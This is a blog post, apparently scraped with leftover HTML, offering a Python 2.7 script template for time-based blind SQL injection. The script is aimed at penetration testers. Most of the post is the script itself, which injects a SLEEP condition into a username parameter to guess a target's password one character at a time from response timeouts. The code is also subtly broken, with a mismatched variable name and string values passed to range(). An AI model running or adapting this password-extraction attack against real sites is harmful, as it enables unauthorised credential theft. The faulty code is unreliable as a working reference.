|  |  |  |  |  |  | 

Cracking Tools Ethical Hacking and Pentesting MySQL Python Scriptting Software Security

Very Simple Blind Sql Injection Python 2.7.x Script Template for Penetration Testers

img-responsive

Do not forget change parameters with your own…

</p>
<p>#Very Simplish Blind Sql Injection Script Template for Python 2.7.X<br />
import requests</p>
<p>#Sample character set<br />
characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'</p>
<p>#Sample target<br />
target = 'CHANGE_ME_FIRST ex:www.abc.com'</p>
<p>#Sample parameters<br />
username = 'CHANGE_ME_FIRST ex:admin'<br />
password_length = 'CHANGE_ME_FIRST ex:12'<br />
sqlSleepTime = 'CHANGE_ME_FIRST ex:5'<br />
requestTimeOut = 'CHANGE_ME_FIRST ex:1'</p>
<p>r = requests.get(target)<br />
if r.status_code != requests.codes.ok:<br />
        raise ValueError('Sorry! We cannot connect the site...')<br />
else:<br />
        print 'Connection OK! We can go now...'</p>
<p>#FatalityPunction<br />
def letBlind ():<br />
    foundChars = ''<br />
    for i in range(password_length):<br />
        for c in characters:<br />
            try:<br />
                blindSql = '?username='+username+'&quot; AND IF(password like BINARY &quot;'+foundChars+c+'%&quot;,sleep('+sleepTime+'),null)&quot;'<br />
                r = requests.get(target+blindSql,timeout=requestTimeOut)<br />
            except requests.exceptions.Timeout:<br />
                foundChars += c<br />
                print 'Found chars in password: ' + foundChars<br />
                break<br />
#Start show...<br />
letBlind()</p>
<p>

very-simple-blind-sql-injection-python-2-7-x-script-template-for-peneteration-testers

ABOUT THE AUTHOR

Application Security , Information and Software Security Specialist Ethical Hacker and Pentester

POST YOUR COMMENTS

Your email address will not be published. Required fields are marked *

Name *

Email *

Website